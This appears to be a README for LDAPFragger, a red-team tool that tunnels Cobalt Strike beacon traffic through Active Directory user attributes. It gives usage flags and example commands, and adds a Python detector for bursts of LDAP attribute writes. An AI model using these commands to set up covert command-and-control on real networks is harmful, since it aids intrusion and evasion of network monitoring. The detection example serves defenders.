LDAPFragger - Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP


LDAPFragger is a Command and Control tool that enables attackers to route Cobalt Strike beacon data over LDAP using user attributes.

For background information, read the release blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes


Dependencies and installation

  • Compiled with .NET 4.0, but may work with older and newer .NET frameworks as well

Usage

     _     _              __
    | |   | |            / _|
    | | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __
    | |/ _` |/ _` | '_ \|  _| '__/ _` |/ _` |/ _` |/ _ \ '__|
    | | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |
    |_|\__,_|\__,_| .__/|_| |_|  \__,_|\__, |\__, |\___|_|
                  | |                   __/ | __/ |
                  |_|                  |___/ |___/

    Fox-IT - Rindert Kramer

    Usage:
        --cshost:  IP address or hostname of the Cobalt Strike instance
        --csport:  Port of the external C2 interface on the Cobalt Strike server
        -u:        Username to connect to Active Directory
        -p:        Password to connect to Active Directory
        -d:        FQDN of the Active Directory domain
        --ldaps:   Use LDAPS instead of LDAP
        -v:        Verbose output
        -h:        Display this message

    If no AD credentials are provided, integrated AD authentication will be used.

Example usage:

From network segment A, run

    LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
    LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

From network segment B, run

    LDAPFragger
    LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS can be used with the --ldaps flag; however, regular LDAP traffic is encrypted as well. Note that the default Cobalt Strike payload will get caught by most AVs.
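For defenders: the following is an added example, not part of LDAPFragger or of the original page. It assumes that a channel carried in user attributes shows up as repeated writes to the same attribute, and counts writes per account, object and attribute over a sliding window. The events are constructed and shaped like Windows Security event 5136 (a directory service object was modified); the window, threshold, account names and attribute names are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumption: tune to the environment
THRESHOLD = 20                 # assumption: writes per (subject, object, attribute)


def find_write_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Return {(subject, object_dn, attribute): peak_count} for every key whose
    number of writes inside a sliding window reaches the threshold.

    events: iterable of (timestamp, subject, object_dn, attribute) tuples,
    e.g. extracted from event 5136 records by a separate parser.
    """
    recent = defaultdict(deque)  # key -> timestamps still inside the window
    peaks = {}
    for ts, subject, object_dn, attribute in sorted(events):
        # DNs and attribute names are case-insensitive in AD, so normalise them.
        key = (subject, object_dn.lower(), attribute.lower())
        stamps = recent[key]
        stamps.append(ts)
        while ts - stamps[0] > window:
            stamps.popleft()
        if len(stamps) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(stamps))
    return peaks


def sample_events():
    """Constructed data: one account rewriting an attribute every 5 seconds,
    and one helpdesk account making three edits an hour apart."""
    start = datetime(2020, 3, 19, 9, 0, 0)
    noisy = [(start + timedelta(seconds=5 * i), "CORP\\user1",
              "CN=user1,OU=Staff,DC=corp,DC=example", "info")
             for i in range(60)]
    normal = [(start + timedelta(hours=i), "CORP\\helpdesk",
               "CN=user2,OU=Staff,DC=corp,DC=example", "telephoneNumber")
              for i in range(3)]
    return noisy + normal


if __name__ == "__main__":
    for (subject, dn, attr), peak in find_write_bursts(sample_events()).items():
        print(f"{subject} wrote {attr} on {dn} {peak} times within {WINDOW}")
```

Event 5136 is only logged when directory service change auditing is enabled and the objects carry a matching audit entry, so absence of hits is not evidence of absence.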





